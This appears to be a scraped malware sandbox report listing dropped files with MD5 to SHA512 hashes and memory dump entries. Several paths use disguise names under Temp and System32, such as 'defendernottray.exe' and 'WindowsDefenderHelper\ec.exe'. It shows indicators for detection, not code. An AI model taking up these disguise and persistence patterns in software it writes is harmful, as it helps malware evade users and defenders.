331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
MD5
5ec2741199ca8f45f24e4d1f943df63d

SHA1
c72b4d4ca24bee746106611268ff1b85461aa561

SHA256
444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3

SHA512
e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
MD5
5ec2741199ca8f45f24e4d1f943df63d

SHA1
c72b4d4ca24bee746106611268ff1b85461aa561

SHA256
444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3

SHA512
e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17482\python39.dll
MD5
5cd203d356a77646856341a0c9135fc6

SHA1
a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

SHA256
a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

SHA512
390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
fb5552899068bced50732aba0188caa8

SHA1
a0433c6aec9d0a39d57eb9ddd98b2009e314367d

SHA256
edc8c78e8ce4a155efc4e838f2c22edac8f510c5f57e164ee5eef29632b9c2e8

SHA512
7c6bb696be0d2cfce8a5f25b8d565b41b9ce1ca8050c79188db2a739674efc7513575af85f005b682bbfe1fed443d30b1aadb124736f15bc3e69be2572c05a23

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
fb5552899068bced50732aba0188caa8

SHA1
a0433c6aec9d0a39d57eb9ddd98b2009e314367d

SHA256
edc8c78e8ce4a155efc4e838f2c22edac8f510c5f57e164ee5eef29632b9c2e8

SHA512
7c6bb696be0d2cfce8a5f25b8d565b41b9ce1ca8050c79188db2a739674efc7513575af85f005b682bbfe1fed443d30b1aadb124736f15bc3e69be2572c05a23

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
fb5552899068bced50732aba0188caa8

SHA1
a0433c6aec9d0a39d57eb9ddd98b2009e314367d

SHA256
edc8c78e8ce4a155efc4e838f2c22edac8f510c5f57e164ee5eef29632b9c2e8

SHA512
7c6bb696be0d2cfce8a5f25b8d565b41b9ce1ca8050c79188db2a739674efc7513575af85f005b682bbfe1fed443d30b1aadb124736f15bc3e69be2572c05a23

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
fb5552899068bced50732aba0188caa8

SHA1
a0433c6aec9d0a39d57eb9ddd98b2009e314367d

SHA256
edc8c78e8ce4a155efc4e838f2c22edac8f510c5f57e164ee5eef29632b9c2e8

SHA512
7c6bb696be0d2cfce8a5f25b8d565b41b9ce1ca8050c79188db2a739674efc7513575af85f005b682bbfe1fed443d30b1aadb124736f15bc3e69be2572c05a23

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
517c3febd347d56e95896a8cc46296e3

SHA1
c310daaa8cd75d948b6b2d3150ea2899849bfccf

SHA256
72e2a9c613eca7f07bc8c662bf30f739388e26d2b3af17f1839f1ced73080d0d

SHA512
2184ba2ea484c5f1aba26f8b4cb89f5a2cdf5e653071d5410be9cbdafb59f355ae924f8f587855e30afa9571e233d82d845043090c17c26be32597b14c364357

Download Submit
C:\Windows\System32\Microsoft\libs\sihost64.exe
MD5
f5ef4636b216797398fffe3091c01610

SHA1
a30df8843c3e890539c95b4c918c0f6448cad0de

SHA256
126bc8f231ab1e5e956c4fa5d56e70e9e2da1466028a3c4ae76c2b38e32d4c91

SHA512
11b5f8f4af79f08072b0bbab9bb85cd3dc713098362dbefe2ec5787e7882c953eaba1efd60b56ec4e75db7d2e3f0740302cd8f7239417553cea74911f23fa4ed

Download Submit
C:\Windows\System32\Microsoft\telemetry\sihost32.exe
MD5
144e6255f2e7fd4439d41cb62cb19f9b

SHA1
69c1e3e0d0dd7d4094e9d682203019e33aa130ba

SHA256
3a3b3a401a1861020b589bad60f954d2ac744ebabd7d59950e63bb7d1bed7499

SHA512
270a25a39cb02348ecfd6357984c45795baf329778409ccfca302c706273e062a99c8098f87637a00c2a51cfc68e5edb3b47d80069e0c7e451eca0ede69529e3

Download Submit
C:\Windows\System32\defendernottray.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\Windows\System32\trayfontdefender.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
C:\windows\system32\defendernottray.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\windows\system32\microsoft\libs\sihost64.exe
MD5
f5ef4636b216797398fffe3091c01610

SHA1
a30df8843c3e890539c95b4c918c0f6448cad0de

SHA256
126bc8f231ab1e5e956c4fa5d56e70e9e2da1466028a3c4ae76c2b38e32d4c91

SHA512
11b5f8f4af79f08072b0bbab9bb85cd3dc713098362dbefe2ec5787e7882c953eaba1efd60b56ec4e75db7d2e3f0740302cd8f7239417553cea74911f23fa4ed

Download Submit
C:\windows\system32\microsoft\telemetry\sihost32.exe
MD5
144e6255f2e7fd4439d41cb62cb19f9b

SHA1
69c1e3e0d0dd7d4094e9d682203019e33aa130ba

SHA256
3a3b3a401a1861020b589bad60f954d2ac744ebabd7d59950e63bb7d1bed7499

SHA512
270a25a39cb02348ecfd6357984c45795baf329778409ccfca302c706273e062a99c8098f87637a00c2a51cfc68e5edb3b47d80069e0c7e451eca0ede69529e3

Download Submit
C:\windows\system32\trayfontdefender.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
MD5
f66e55cb2019425ba694948cc0355560

SHA1
30d2e88f4da43baa0055ce592bbdbd13e0f7244a

SHA256
8439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7

SHA512
e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23

Download Submit
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
MD5
ad8e052d00bfc89e09c047f048ea63da

SHA1
c1d0dba06f790d20794039970fe61d94479ee6f9

SHA256
ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab

SHA512
b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b

Download Submit
\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
MD5
2ed63566ece20dbdfbb8bed11e075ddc

SHA1
b7d411fa43c83fceabc557368edab88c23b0a5c7

SHA256
a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a

SHA512
a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69

Download Submit
\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
MD5
5ec2741199ca8f45f24e4d1f943df63d

SHA1
c72b4d4ca24bee746106611268ff1b85461aa561

SHA256
444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3

SHA512
e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523

Download Submit
\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI17482\python39.dll
MD5
5cd203d356a77646856341a0c9135fc6

SHA1
a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

SHA256
a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

SHA512
390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

Download Submit
\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7

Download Submit
\Users\Admin\AppData\Local\Temp\python\python.exe
MD5
97a51fcdffeac1ea53ede5c91607a73e

SHA1
1c95c43b104a7faa79691714556c2c7b5d153697

SHA256
0c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26

SHA512
e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7

Download Submit
\Windows\System32\Microsoft\libs\sihost64.exe
MD5
f5ef4636b216797398fffe3091c01610

SHA1
a30df8843c3e890539c95b4c918c0f6448cad0de

SHA256
126bc8f231ab1e5e956c4fa5d56e70e9e2da1466028a3c4ae76c2b38e32d4c91

SHA512
11b5f8f4af79f08072b0bbab9bb85cd3dc713098362dbefe2ec5787e7882c953eaba1efd60b56ec4e75db7d2e3f0740302cd8f7239417553cea74911f23fa4ed

Download Submit
\Windows\System32\Microsoft\telemetry\sihost32.exe
MD5
144e6255f2e7fd4439d41cb62cb19f9b

SHA1
69c1e3e0d0dd7d4094e9d682203019e33aa130ba

SHA256
3a3b3a401a1861020b589bad60f954d2ac744ebabd7d59950e63bb7d1bed7499

SHA512
270a25a39cb02348ecfd6357984c45795baf329778409ccfca302c706273e062a99c8098f87637a00c2a51cfc68e5edb3b47d80069e0c7e451eca0ede69529e3

Download Submit
\Windows\System32\defendernottray.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
\Windows\System32\trayfontdefender.exe
MD5
32f61892924acfadb0a93c3fdbdde02f

SHA1
dc9f82ec9db0225cbf88521739160a31b15d4a9e

SHA256
69caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5

SHA512
f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37

Download Submit
memory/324-99-0x0000000000000000-mapping.dmp

Download
memory/796-110-0x0000000000000000-mapping.dmp

Download
memory/796-113-0x0000000002320000-0x0000000002321000-memory.dmp

Filesize
4KB

Download
memory/796-114-0x000000001AD00000-0x000000001AD01000-memory.dmp

Filesize
4KB

Download
memory/796-118-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/820-96-0x0000000000000000-mapping.dmp

Download
memory/820-107-0x0000000001F60000-0x0000000001F62000-memory.dmp

Filesize
8KB

Download
memory/864-98-0x0000000000000000-mapping.dmp

Download
memory/928-237-0x0000000000000000-mapping.dmp

Download
memory/1136-206-0x0000000000000000-mapping.dmp

Download
memory/1196-82-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/1196-66-0x0000000000000000-mapping.dmp

Download
memory/1304-64-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1304-60-0x0000000075551000-0x0000000075553000-memory.dmp

Filesize
8KB

Download
memory/1328-79-0x000000013FB70000-0x000000013FB71000-memory.dmp

Filesize
4KB

Download
memory/1328-106-0x000000001ABE0000-0x000000001ABE2000-memory.dmp

Filesize
8KB

Download
memory/1328-170-0x00000000006B0000-0x00000000006D3000-memory.dmp

Filesize
140KB

Download
memory/1328-70-0x0000000000000000-mapping.dmp

Download
memory/1340-78-0x000000013FB80000-0x000000013FB81000-memory.dmp

Filesize
4KB

Download
memory/1340-72-0x0000000000000000-mapping.dmp

Download
memory/1340-169-0x00000000007E0000-0x0000000000800000-memory.dmp

Filesize
128KB

Download
memory/1492-84-0x0000000000000000-mapping.dmp

Download
memory/1492-103-0x0000000001350000-0x0000000001351000-memory.dmp

Filesize
4KB

Download
memory/1504-302-0x00000001402EB66C-mapping.dmp

Download
memory/1512-87-0x0000000000000000-mapping.dmp

Download
memory/1512-101-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/1520-338-0x0000000000000000-mapping.dmp

Download
memory/1572-306-0x0000000000000000-mapping.dmp

Download
memory/1620-207-0x0000000000000000-mapping.dmp

Download
memory/1740-90-0x0000000000000000-mapping.dmp

Download
memory/1748-62-0x0000000000000000-mapping.dmp

Download
memory/1824-199-0x0000000000000000-mapping.dmp

Download
memory/1880-111-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp

Filesize
8KB

Download
memory/1880-143-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

Filesize
4KB

Download
memory/1880-128-0x00000000029B0000-0x00000000029B1000-memory.dmp

Filesize
4KB

Download
memory/1880-120-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/1880-109-0x0000000000000000-mapping.dmp

Download
memory/1880-142-0x00000000029F0000-0x00000000029F1000-memory.dmp

Filesize
4KB

Download
memory/1880-123-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/1888-331-0x0000000000000000-mapping.dmp

Download
memory/2068-335-0x0000000000000000-mapping.dmp

Download
memory/2068-255-0x0000000000000000-mapping.dmp

Download
memory/2172-124-0x0000000000000000-mapping.dmp

Download
memory/2172-213-0x0000000000000000-mapping.dmp

Download
memory/2180-250-0x0000000000000000-mapping.dmp

Download
memory/2184-269-0x0000000000000000-mapping.dmp

Download
memory/2216-191-0x0000000000000000-mapping.dmp

Download
memory/2240-262-0x0000000000000000-mapping.dmp

Download
memory/2244-270-0x0000000000000000-mapping.dmp

Download
memory/2248-305-0x0000000000000000-mapping.dmp

Download
memory/2260-268-0x0000000000000000-mapping.dmp

Download
memory/2264-194-0x0000000000000000-mapping.dmp

Download
memory/2264-126-0x0000000000000000-mapping.dmp

Download
memory/2276-304-0x0000000000000000-mapping.dmp

Download
memory/2280-327-0x0000000000000000-mapping.dmp

Download
memory/2312-129-0x0000000000000000-mapping.dmp

Download
memory/2316-275-0x0000000000000000-mapping.dmp

Download
memory/2416-248-0x0000000000000000-mapping.dmp

Download
memory/2416-312-0x0000000000000000-mapping.dmp

Download
memory/2448-337-0x0000000000000000-mapping.dmp

Download
memory/2460-334-0x0000000000000000-mapping.dmp

Download
memory/2536-151-0x0000000000000000-mapping.dmp

Download
memory/2536-176-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/2536-163-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/2588-155-0x0000000000000000-mapping.dmp

Download
memory/2604-279-0x0000000000000000-mapping.dmp

Download
memory/2624-157-0x0000000000000000-mapping.dmp

Download
memory/2624-289-0x0000000000000000-mapping.dmp

Download
memory/2636-158-0x0000000000000000-mapping.dmp

Download
memory/2648-159-0x0000000000000000-mapping.dmp

Download
memory/2660-160-0x0000000000000000-mapping.dmp

Download
memory/2692-322-0x0000000000000000-mapping.dmp

Download
memory/2800-290-0x0000000000000000-mapping.dmp

Download
memory/2824-172-0x0000000000000000-mapping.dmp

Download
memory/2828-336-0x0000000000000000-mapping.dmp

Download
memory/2840-225-0x0000000000000000-mapping.dmp

Download
memory/2848-173-0x0000000000000000-mapping.dmp

Download
memory/2856-226-0x0000000000000000-mapping.dmp

Download
memory/2864-247-0x0000000000000000-mapping.dmp

Download
memory/2884-174-0x0000000000000000-mapping.dmp

Download
memory/2912-175-0x0000000000000000-mapping.dmp

Download
memory/2916-246-0x0000000000000000-mapping.dmp

Download
memory/2948-240-0x0000000000000000-mapping.dmp

Download
memory/2956-179-0x0000000000000000-mapping.dmp

Download
memory/2956-182-0x000000013F100000-0x000000013F101000-memory.dmp

Filesize
4KB

Download
memory/2996-188-0x000000013F200000-0x000000013F201000-memory.dmp

Filesize
4KB

Download
memory/2996-185-0x0000000000000000-mapping.dmp

Download
memory/3044-189-0x0000000000000000-mapping.dmp

Download